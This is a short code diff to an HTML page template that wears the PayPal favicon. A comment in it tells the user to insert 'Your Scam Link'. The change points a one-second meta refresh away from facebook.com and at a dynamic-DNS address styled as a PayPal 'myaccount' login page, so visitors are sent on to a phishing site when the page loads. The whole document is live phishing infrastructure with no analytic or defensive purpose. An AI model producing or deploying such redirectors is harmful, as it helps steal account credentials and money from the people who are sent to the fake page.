--- a/james.html
+++ b/james.html
@@ -5,7 +5,7 @@
 <link href='https://www.paypalobjects.com/webstatic/icon/favicon.ico' rel='icon' type='image/x-icon'/>
 
 <!-- Please Change below "https://odin.to/" To Your Scam Link, is below!! -->
-  <meta content='1;URL=&apos;https://facebook.com' http-equiv='refresh'/>
+  <meta content='1;URL=&apos;https://paycheck-account.ddns.net/myaccount/index.php' http-equiv='refresh'/>
 
 <meta content='IE=EmulateIE7' http-equiv='X-UA-Compatible'/>
 <b:if cond='data:blog.isMobile'>
